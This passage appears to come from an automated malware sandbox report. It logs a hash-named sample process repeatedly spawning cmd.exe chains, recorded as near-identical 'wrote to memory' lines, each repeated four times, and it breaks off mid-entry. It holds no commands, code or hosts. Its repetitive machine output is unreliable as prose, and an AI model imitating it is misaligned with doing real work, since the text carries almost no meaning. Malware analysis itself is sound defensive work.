wrote to memory of 756 280 cmd.exe 504 PID 280 wrote to memory of 756 280 cmd.exe 504 PID 280 wrote to memory of 756 280 cmd.exe 504 PID 280 wrote to memory of 756 280 cmd.exe 504 PID 756 wrote to memory of 744 756 cmd.exe 505 PID 756 wrote to memory of 744 756 cmd.exe 505 PID 756 wrote to memory of 744 756 cmd.exe 505 PID 756 wrote to memory of 744 756 cmd.exe 505 PID 280 wrote to memory of 864 280 cmd.exe 506 PID 280 wrote to memory of 864 280 cmd.exe 506 PID 280 wrote to memory of 864 280 cmd.exe 506 PID 280 wrote to memory of 864 280 cmd.exe 506 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 507 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 507 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 507 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 507 PID 676 wrote to memory of 436 676 cmd.exe 509 PID 676 wrote to memory of 436 676 cmd.exe 509 PID 676 wrote to memory of 436 676 cmd.exe 509 PID 676 wrote to memory of 436 676 cmd.exe 509 PID 676 wrote to memory of 1240 676 cmd.exe 510 PID 676 wrote to memory of 1240 676 cmd.exe 510 PID 676 wrote to memory of 1240 676 cmd.exe 510 PID 676 wrote to memory of 1240 676 cmd.exe 510 PID 676 wrote to memory of 1220 676 cmd.exe 511 PID 676 wrote to memory of 1220 676 cmd.exe 511 PID 676 wrote to memory of 1220 676 cmd.exe 511 PID 676 wrote to memory of 1220 676 cmd.exe 511 PID 1220 wrote to memory of 212 1220 cmd.exe 512 PID 1220 wrote to memory of 212 1220 cmd.exe 512 PID 1220 wrote to memory of 212 1220 cmd.exe 512 PID 1220 wrote to memory of 212 1220 cmd.exe 512 PID 676 wrote to memory of 1068 676 cmd.exe 513 PID 676 wrote to memory of 1068 676 cmd.exe 513 PID 676 wrote to memory of 1068 676 cmd.exe 513 PID 676 wrote to memory of 1068 676 cmd.exe 513 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 514 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 514 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 514 PID 672 wrote to memory of 1736 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 514 PID 1736 wrote to memory of 1828 1736 cmd.exe 516 PID 1736 wrote to memory of 1828 1736 cmd.exe 516 PID 1736 wrote to memory of 1828 1736 cmd.exe 516 PID 1736 wrote to memory of 1828 1736 cmd.exe 516 PID 1736 wrote to memory of 1216 1736 cmd.exe 517 PID 1736 wrote to memory of 1216 1736 cmd.exe 517 PID 1736 wrote to memory of 1216 1736 cmd.exe 517 PID 1736 wrote to memory of 1216 1736 cmd.exe 517 PID 1736 wrote to memory of 1572 1736 cmd.exe 518 PID 1736 wrote to memory of 1572 1736 cmd.exe 518 PID 1736 wrote to memory of 1572 1736 cmd.exe 518 PID 1736 wrote to memory of 1572 1736 cmd.exe 518 PID 1572 wrote to memory of 1848 1572 cmd.exe 519 PID 1572 wrote to memory of 1848 1572 cmd.exe 519 PID 1572 wrote to memory of 1848 1572 cmd.exe 519 PID 1572 wrote to memory of 1848 1572 cmd.exe 519 PID 1736 wrote to memory of 1384 1736 cmd.exe 520 PID 1736 wrote to memory of 1384 1736 cmd.exe 520 PID 1736 wrote to memory of 1384 1736 cmd.exe 520 PID 1736 wrote to memory of 1384 1736 cmd.exe 520 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 521 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 521 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 521 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 521 PID 992 wrote to memory of 1372 992 cmd.exe 523 PID 992 wrote to memory of 1372 992 cmd.exe 523 PID 992 wrote to memory of 1372 992 cmd.exe 523 PID 992 wrote to memory of 1372 992 cmd.exe 523 PID 992 wrote to memory of 1644 992 cmd.exe 524 PID 992 wrote to memory of 1644 992 cmd.exe 524 PID 992 wrote to memory of 1644 992 cmd.exe 524 PID 992 wrote to memory of 1644 992 cmd.exe 524 PID 992 wrote to memory of 232 992 cmd.exe 525 PID 992 wrote to memory of 232 992 cmd.exe 525 PID 992 wrote to memory of 232 992 cmd.exe 525 PID 992 wrote to memory of 232 992 cmd.exe 525 PID 232 wrote to memory of 864 232 cmd.exe 526 PID 232 wrote to memory of 864 232 cmd.exe 526 PID 232 wrote to memory of 864 232 cmd.exe 526 PID 232 wrote to memory of 864 232 cmd.exe 526 PID 992 wrote to memory of 236 992 cmd.exe 527 PID 992 wrote to memory of 236 992 cmd.exe 527 PID 992 wrote to memory of 236 992 cmd.exe 527 PID 992 wrote to memory of 236 992 cmd.exe 527 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 528 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 528 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 528 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 528 PID 548 wrote to memory of 700 548 cmd.exe 530 PID 548 wrote to memory of 700 548 cmd.exe 530 PID 548 wrote to memory of 700 548 cmd.exe 530 PID 548 wrote to memory of 700 548 cmd.exe 530 PID 548 wrote to memory of 212 548 cmd.exe 531 PID 548 wrote to memory of 212 548 cmd.exe 531 PID 548 wrote to memory of 212 548 cmd.exe 531 PID 548 wrote to memory of 212 548 cmd.exe 531 PID 548 wrote to memory of 1752 548 cmd.exe 532 PID 548 wrote to memory of 1752 548 cmd.exe 532 PID 548 wrote to memory of 1752 548 cmd.exe 532 PID 548 wrote to memory of 1752 548 cmd.exe 532 PID 1752 wrote to memory of 1968 1752 cmd.exe 533 PID 1752 wrote to memory of 1968 1752 cmd.exe 533 PID 1752 wrote to memory of 1968 1752 cmd.exe 533 PID 1752 wrote to memory of 1968 1752 cmd.exe 533 PID 548 wrote to memory of 1836 548 cmd.exe 534 PID 548 wrote to memory of 1836 548 cmd.exe 534 PID 548 wrote to memory of 1836 548 cmd.exe 534 PID 548 wrote to memory of 1836 548 cmd.exe 534 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 535 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 535 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 535 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 535 PID 1052 wrote to memory of 908 1052 cmd.exe 537 PID 1052 wrote to memory of 908 1052 cmd.exe 537 PID 1052 wrote to memory of 908 1052 cmd.exe 537 PID 1052 wrote to memory of 908 1052 cmd.exe 537 PID 1052 wrote to memory of 224 1052 cmd.exe 538 PID 1052 wrote to memory of 224 1052 cmd.exe 538 PID 1052 wrote to memory of 224 1052 cmd.exe 538 PID 1052 wrote to memory of 224 1052 cmd.exe 538 PID 1052 wrote to memory of 1496 1052 cmd.exe 539 PID 1052 wrote to memory of 1496 1052 cmd.exe 539 PID 1052 wrote to memory of 1496 1052 cmd.exe 539 PID 1052 wrote to memory of 1496 1052 cmd.exe 539 PID 1496 wrote to memory of 652 1496 cmd.exe 540 PID 1496 wrote to memory of 652 1496 cmd.exe 540 PID 1496 wrote to memory of 652 1496 cmd.exe 540 PID 1496 wrote to memory of 652 1496 cmd.exe 540 PID 1052 wrote to memory of 1520 1052 cmd.exe 541 PID 1052 wrote to memory of 1520 1052 cmd.exe 541 PID 1052 wrote to memory of 1520 1052 cmd.exe 541 PID 1052 wrote to memory of 1520 1052 cmd.exe 541 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 542 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 542 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 542 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 542 PID 1372 wrote to memory of 320 1372 cmd.exe 544 PID 1372 wrote to memory of 320 1372 cmd.exe 544 PID 1372 wrote to memory of 320 1372 cmd.exe 544 PID 1372 wrote to memory of 320 1372 cmd.exe 544 PID 1372 wrote to memory of 280 1372 cmd.exe 545 PID 1372 wrote to memory of 280 1372 cmd.exe 545 PID 1372 wrote to memory of 280 1372 cmd.exe 545 PID 1372 wrote to memory of 280 1372 cmd.exe 545 PID 1372 wrote to memory of 204 1372 cmd.exe 546 PID 1372 wrote to memory of 204 1372 cmd.exe 546 PID 1372 wrote to memory of 204 1372 cmd.exe 546 PID 1372 wrote to memory of 204 1372 cmd.exe 546 PID 204 wrote to memory of 952 204 cmd.exe 547 PID 204 wrote to memory of 952 204 cmd.exe 547 PID 204 wrote to memory of 952 204 cmd.exe 547 PID 204 wrote to memory of 952 204 cmd.exe 547 PID 1372 wrote to memory of 1920 1372 cmd.exe 548 PID 1372 wrote to memory of 1920 1372 cmd.exe 548 PID 1372 wrote to memory of 1920 1372 cmd.exe 548 PID 1372 wrote to memory of 1920 1372 cmd.exe 548 PID 672 wrote to memory of 700 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 549 PID 672 wrote to memory of 700 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 549 PID 672 wrote to memory of 700 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 549 PID 672 wrote to memory of 700 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 549 PID 700 wrote to memory of 1376 700 cmd.exe 551 PID 700 wrote to memory of 1376 700 cmd.exe 551 PID 700 wrote to memory of 1376 700 cmd.exe 551 PID 700 wrote to memory of 1376 700 cmd.exe 551 PID 700 wrote to memory of 1752 700 cmd.exe 552 PID 700 wrote to memory of 1752 700 cmd.exe 552 PID 700 wrote to memory of 1752 700 cmd.exe 552 PID 700 wrote to memory of 1752 700 cmd.exe 552 PID 700 wrote to memory of 1156 700 cmd.exe 553 PID 700 wrote to memory of 1156 700 cmd.exe 553 PID 700 wrote to memory of 1156 700 cmd.exe 553 PID 700 wrote to memory of 1156 700 cmd.exe 553 PID 1156 wrote to memory of 1576 1156 cmd.exe 554 PID 1156 wrote to memory of 1576 1156 cmd.exe 554 PID 1156 wrote to memory of 1576 1156 cmd.exe 554 PID 1156 wrote to memory of 1576 1156 cmd.exe 554 PID 700 wrote to memory of 1840 700 cmd.exe 555 PID 700 wrote to memory of 1840 700 cmd.exe 555 PID 700 wrote to memory of 1840 700 cmd.exe 555 PID 700 wrote to memory of 1840 700 cmd.exe 555 PID 672 wrote to memory of 908 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 556 PID 672 wrote to memory of 908 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 556 PID 672 wrote to memory of 908 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 556 PID 672 wrote to memory of 908 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 556 PID 908 wrote to memory of 1384 908 cmd.exe 558 PID 908 wrote to memory of 1384 908 cmd.exe 558 PID 908 wrote to memory of 1384 908 cmd.exe 558 PID 908 wrote to memory of 1384 908 cmd.exe 558 PID 908 wrote to memory of 1896 908 cmd.exe 559 PID 908 wrote to memory of 1896 908 cmd.exe 559 PID 908 wrote to memory of 1896 908 cmd.exe 559 PID 908 wrote to memory of 1896 908 cmd.exe 559 PID 908 wrote to memory of 1828 908 cmd.exe 560 PID 908 wrote to memory of 1828 908 cmd.exe 560 PID 908 wrote to memory of 1828 908 cmd.exe 560 PID 908 wrote to memory of 1828 908 cmd.exe 560 PID 1828 wrote to memory of 228 1828 cmd.exe 561 PID 1828 wrote to memory of 228 1828 cmd.exe 561 PID 1828 wrote to memory of 228 1828 cmd.exe 561 PID 1828 wrote to memory of 228 1828 cmd.exe 561 PID 908 wrote to memory of 1292 908 cmd.exe 562 PID 908 wrote to memory of 1292 908 cmd.exe 562 PID 908 wrote to memory of 1292 908 cmd.exe 562 PID 908 wrote to memory of 1292 908 cmd.exe 562 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 563 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 563 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 563 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 563 PID 280 wrote to memory of 236 280 cmd.exe 565 PID 280 wrote to memory of 236 280 cmd.exe 565 PID 280 wrote to memory of 236 280 cmd.exe 565 PID 280 wrote to memory of 236 280 cmd.exe 565 PID 280 wrote to memory of 1812 280 cmd.exe 566 PID 280 wrote to memory of 1812 280 cmd.exe 566 PID 280 wrote to memory of 1812 280 cmd.exe 566 PID 280 wrote to memory of 1812 280 cmd.exe 566 PID 280 wrote to memory of 220 280 cmd.exe 567 PID 280 wrote to memory of 220 280 cmd.exe 567 PID 280 wrote to memory of 220 280 cmd.exe 567 PID 280 wrote to memory of 220 280 cmd.exe 567 PID 220 wrote to memory of 756 220 cmd.exe 568 PID 220 wrote to memory of 756 220 cmd.exe 568 PID 220 wrote to memory of 756 220 cmd.exe 568 PID 220 wrote to memory of 756 220 cmd.exe 568 PID 280 wrote to memory of 1080 280 cmd.exe 569 PID 280 wrote to memory of 1080 280 cmd.exe 569 PID 280 wrote to memory of 1080 280 cmd.exe 569 PID 280 wrote to memory of 1080 280 cmd.exe 569 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 570 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 570 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 570 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 570 PID 1836 wrote to memory of 1156 1836 cmd.exe 572 PID 1836 wrote to memory of 1156 1836 cmd.exe 572 PID 1836 wrote to memory of 1156 1836 cmd.exe 572 PID 1836 wrote to memory of 1156 1836 cmd.exe 572 PID 1836 wrote to memory of 1840 1836 cmd.exe 573 PID 1836 wrote to memory of 1840 1836 cmd.exe 573 PID 1836 wrote to memory of 1840 1836 cmd.exe 573 PID 1836 wrote to memory of 1840 1836 cmd.exe 573 PID 1836 wrote to memory of 1032 1836 cmd.exe 574 PID 1836 wrote to memory of 1032 1836 cmd.exe 574 PID 1836 wrote to memory of 1032 1836 cmd.exe 574 PID 1836 wrote to memory of 1032 1836 cmd.exe 574 PID 1032 wrote to memory of 1572 1032 cmd.exe 575 PID 1032 wrote to memory of 1572 1032 cmd.exe 575 PID 1032 wrote to memory of 1572 1032 cmd.exe 575 PID 1032 wrote to memory of 1572 1032 cmd.exe 575 PID 1836 wrote to memory of 1520 1836 cmd.exe 576 PID 1836 wrote to memory of 1520 1836 cmd.exe 576 PID 1836 wrote to memory of 1520 1836 cmd.exe 576 PID 1836 wrote to memory of 1520 1836 cmd.exe 576 PID 672 wrote to memory of 1644 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 577 PID 672 wrote to memory of 1644 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 577 PID 672 wrote to memory of 1644 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 577 PID 672 wrote to memory of 1644 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 577 PID 1644 wrote to memory of 980 1644 cmd.exe 579 PID 1644 wrote to memory of 980 1644 cmd.exe 579 PID 1644 wrote to memory of 980 1644 cmd.exe 579 PID 1644 wrote to memory of 980 1644 cmd.exe 579 PID 1644 wrote to memory of 1292 1644 cmd.exe 580 PID 1644 wrote to memory of 1292 1644 cmd.exe 580 PID 1644 wrote to memory of 1292 1644 cmd.exe 580 PID 1644 wrote to memory of 1292 1644 cmd.exe 580 PID 1644 wrote to memory of 1960 1644 cmd.exe 581 PID 1644 wrote to memory of 1960 1644 cmd.exe 581 PID 1644 wrote to memory of 1960 1644 cmd.exe 581 PID 1644 wrote to memory of 1960 1644 cmd.exe 581 PID 1960 wrote to memory of 964 1960 cmd.exe 582 PID 1960 wrote to memory of 964 1960 cmd.exe 582 PID 1960 wrote to memory of 964 1960 cmd.exe 582 PID 1960 wrote to memory of 964 1960 cmd.exe 582 PID 1644 wrote to memory of 1920 1644 cmd.exe 583 PID 1644 wrote to memory of 1920 1644 cmd.exe 583 PID 1644 wrote to memory of 1920 1644 cmd.exe 583 PID 1644 wrote to memory of 1920 1644 cmd.exe 583 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 584 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 584 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 584 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 584 PID 1968 wrote to memory of 896 1968 cmd.exe 586 PID 1968 wrote to memory of 896 1968 cmd.exe 586 PID 1968 wrote to memory of 896 1968 cmd.exe 586 PID 1968 wrote to memory of 896 1968 cmd.exe 586 PID 1968 wrote to memory of 952 1968 cmd.exe 587 PID 1968 wrote to memory of 952 1968 cmd.exe 587 PID 1968 wrote to memory of 952 1968 cmd.exe 587 PID 1968 wrote to memory of 952 1968 cmd.exe 587 PID 1968 wrote to memory of 992 1968 cmd.exe 588 PID 1968 wrote to memory of 992 1968 cmd.exe 588 PID 1968 wrote to memory of 992 1968 cmd.exe 588 PID 1968 wrote to memory of 992 1968 cmd.exe 588 PID 992 wrote to memory of 1652 992 cmd.exe 589 PID 992 wrote to memory of 1652 992 cmd.exe 589 PID 992 wrote to memory of 1652 992 cmd.exe 589 PID 992 wrote to memory of 1652 992 cmd.exe 589 PID 1968 wrote to memory of 1156 1968 cmd.exe 590 PID 1968 wrote to memory of 1156 1968 cmd.exe 590 PID 1968 wrote to memory of 1156 1968 cmd.exe 590 PID 1968 wrote to memory of 1156 1968 cmd.exe 590 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 591 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 591 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 591 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 591 PID 212 wrote to memory of 1032 212 cmd.exe 593 PID 212 wrote to memory of 1032 212 cmd.exe 593 PID 212 wrote to memory of 1032 212 cmd.exe 593 PID 212 wrote to memory of 1032 212 cmd.exe 593 PID 212 wrote to memory of 2044 212 cmd.exe 594 PID 212 wrote to memory of 2044 212 cmd.exe 594 PID 212 wrote to memory of 2044 212 cmd.exe 594 PID 212 wrote to memory of 2044 212 cmd.exe 594 PID 212 wrote to memory of 548 212 cmd.exe 595 PID 212 wrote to memory of 548 212 cmd.exe 595 PID 212 wrote to memory of 548 212 cmd.exe 595 PID 212 wrote to memory of 548 212 cmd.exe 595 PID 548 wrote to memory of 1064 548 cmd.exe 596 PID 548 wrote to memory of 1064 548 cmd.exe 596 PID 548 wrote to memory of 1064 548 cmd.exe 596 PID 548 wrote to memory of 1064 548 cmd.exe 596 PID 212 wrote to memory of 980 212 cmd.exe 597 PID 212 wrote to memory of 980 212 cmd.exe 597 PID 212 wrote to memory of 980 212 cmd.exe 597 PID 212 wrote to memory of 980 212 cmd.exe 597 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 598 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 598 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 598 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 598 PID 904 wrote to memory of 1960 904 cmd.exe 600 PID 904 wrote to memory of 1960 904 cmd.exe 600 PID 904 wrote to memory of 1960 904 cmd.exe 600 PID 904 wrote to memory of 1960 904 cmd.exe 600 PID 904 wrote to memory of 524 904 cmd.exe 601 PID 904 wrote to memory of 524 904 cmd.exe 601 PID 904 wrote to memory of 524 904 cmd.exe 601 PID 904 wrote to memory of 524 904 cmd.exe 601 PID 904 wrote to memory of 228 904 cmd.exe 602 PID 904 wrote to memory of 228 904 cmd.exe 602 PID 904 wrote to memory of 228 904 cmd.exe 602 PID 904 wrote to memory of 228 904 cmd.exe 602 PID 228 wrote to memory of 1368 228 cmd.exe 603 PID 228 wrote to memory of 1368 228 cmd.exe 603 PID 228 wrote to memory of 1368 228 cmd.exe 603 PID 228 wrote to memory of 1368 228 cmd.exe 603 PID 904 wrote to memory of 896 904 cmd.exe 604 PID 904 wrote to memory of 896 904 cmd.exe 604 PID 904 wrote to memory of 896 904 cmd.exe 604 PID 904 wrote to memory of 896 904 cmd.exe 604 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 605 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 605 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 605 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 605 PID 1552 wrote to memory of 948 1552 cmd.exe 607 PID 1552 wrote to memory of 948 1552 cmd.exe 607 PID 1552 wrote to memory of 948 1552 cmd.exe 607 PID 1552 wrote to memory of 948 1552 cmd.exe 607 PID 1552 wrote to memory of 1156 1552 cmd.exe 608 PID 1552 wrote to memory of 1156 1552 cmd.exe 608 PID 1552 wrote to memory of 1156 1552 cmd.exe 608 PID 1552 wrote to memory of 1156 1552 cmd.exe 608 PID 1552 wrote to memory of 364 1552 cmd.exe 609 PID 1552 wrote to memory of 364 1552 cmd.exe 609 PID 1552 wrote to memory of 364 1552 cmd.exe 609 PID 1552 wrote to memory of 364 1552 cmd.exe 609 PID 364 wrote to memory of 760 364 cmd.exe 610 PID 364 wrote to memory of 760 364 cmd.exe 610 PID 364 wrote to memory of 760 364 cmd.exe 610 PID 364 wrote to memory of 760 364 cmd.exe 610 PID 1552 wrote to memory of 360 1552 cmd.exe 611 PID 1552 wrote to memory of 360 1552 cmd.exe 611 PID 1552 wrote to memory of 360 1552 cmd.exe 611 PID 1552 wrote to memory of 360 1552 cmd.exe 611 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 612 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 612 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 612 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 612 PID 1488 wrote to memory of 544 1488 cmd.exe 614 PID 1488 wrote to memory of 544 1488 cmd.exe 614 PID 1488 wrote to memory of 544 1488 cmd.exe 614 PID 1488 wrote to memory of 544 1488 cmd.exe 614 PID 1488 wrote to memory of 676 1488 cmd.exe 615 PID 1488 wrote to memory of 676 1488 cmd.exe 615 PID 1488 wrote to memory of 676 1488 cmd.exe 615 PID 1488 wrote to memory of 676 1488 cmd.exe 615 PID 1488 wrote to memory of 1496 1488 cmd.exe 616 PID 1488 wrote to memory of 1496 1488 cmd.exe 616 PID 1488 wrote to memory of 1496 1488 cmd.exe 616 PID 1488 wrote to memory of 1496 1488 cmd.exe 616 PID 1496 wrote to memory of 204 1496 cmd.exe 617 PID 1496 wrote to memory of 204 1496 cmd.exe 617 PID 1496 wrote to memory of 204 1496 cmd.exe 617 PID 1496 wrote to memory of 204 1496 cmd.exe 617 PID 1488 wrote to memory of 1828 1488 cmd.exe 618 PID 1488 wrote to memory of 1828 1488 cmd.exe 618 PID 1488 wrote to memory of 1828 1488 cmd.exe 618 PID 1488 wrote to memory of 1828 1488 cmd.exe 618 PID 672 wrote to memory of 1376 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 619 PID 672 wrote to memory of 1376 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 619 PID 672 wrote to memory of 1376 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 619 PID 672 wrote to memory of 1376 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 619 PID 1376 wrote to memory of 1244 1376 cmd.exe 621 PID 1376 wrote to memory of 1244 1376 cmd.exe 621 PID 1376 wrote to memory of 1244 1376 cmd.exe 621 PID 1376 wrote to memory of 1244 1376 cmd.exe 621 PID 1376 wrote to memory of 896 1376 cmd.exe 622 PID 1376 wrote to memory of 896 1376 cmd.exe 622 PID 1376 wrote to memory of 896 1376 cmd.exe 622 PID 1376 wrote to memory of 896 1376 cmd.exe 622 PID 1376 wrote to memory of 236 1376 cmd.exe 623 PID 1376 wrote to memory of 236 1376 cmd.exe 623 PID 1376 wrote to memory of 236 1376 cmd.exe 623 PID 1376 wrote to memory of 236 1376 cmd.exe 623 PID 236 wrote to memory of 1848 236 cmd.exe 624 PID 236 wrote to memory of 1848 236 cmd.exe 624 PID 236 wrote to memory of 1848 236 cmd.exe 624 PID 236 wrote to memory of 1848 236 cmd.exe 624 PID 1376 wrote to memory of 948 1376 cmd.exe 625 PID 1376 wrote to memory of 948 1376 cmd.exe 625 PID 1376 wrote to memory of 948 1376 cmd.exe 625 PID 1376 wrote to memory of 948 1376 cmd.exe 625 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 626 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 626 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 626 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 626 PID 744 wrote to memory of 364 744 cmd.exe 628 PID 744 wrote to memory of 364 744 cmd.exe 628 PID 744 wrote to memory of 364 744 cmd.exe 628 PID 744 wrote to memory of 364 744 cmd.exe 628 PID 744 wrote to memory of 360 744 cmd.exe 629 PID 744 wrote to memory of 360 744 cmd.exe 629 PID 744 wrote to memory of 360 744 cmd.exe 629 PID 744 wrote to memory of 360 744 cmd.exe 629 PID 744 wrote to memory of 1216 744 cmd.exe 630 PID 744 wrote to memory of 1216 744 cmd.exe 630 PID 744 wrote to memory of 1216 744 cmd.exe 630 PID 744 wrote to memory of 1216 744 cmd.exe 630 PID 1216 wrote to memory of 436 1216 cmd.exe 631 PID 1216 wrote to memory of 436 1216 cmd.exe 631 PID 1216 wrote to memory of 436 1216 cmd.exe 631 PID 1216 wrote to memory of 436 1216 cmd.exe 631 PID 744 wrote to memory of 908 744 cmd.exe 632 PID 744 wrote to memory of 908 744 cmd.exe 632 PID 744 wrote to memory of 908 744 cmd.exe 632 PID 744 wrote to memory of 908 744 cmd.exe 632 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 633 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 633 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 633 PID 672 wrote to memory of 676 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 633 PID 676 wrote to memory of 1292 676 cmd.exe 635 PID 676 wrote to memory of 1292 676 cmd.exe 635 PID 676 wrote to memory of 1292 676 cmd.exe 635 PID 676 wrote to memory of 1292 676 cmd.exe 635 PID 676 wrote to memory of 1644 676 cmd.exe 636 PID 676 wrote to memory of 1644 676 cmd.exe 636 PID 676 wrote to memory of 1644 676 cmd.exe 636 PID 676 wrote to memory of 1644 676 cmd.exe 636 PID 676 wrote to memory of 548 676 cmd.exe 637 PID 676 wrote to memory of 548 676 cmd.exe 637 PID 676 wrote to memory of 548 676 cmd.exe 637 PID 676 wrote to memory of 548 676 cmd.exe 637 PID 548 wrote to memory of 320 548 cmd.exe 638 PID 548 wrote to memory of 320 548 cmd.exe 638 PID 548 wrote to memory of 320 548 cmd.exe 638 PID 548 wrote to memory of 320 548 cmd.exe 638 PID 676 wrote to memory of 280 676 cmd.exe 639 PID 676 wrote to memory of 280 676 cmd.exe 639 PID 676 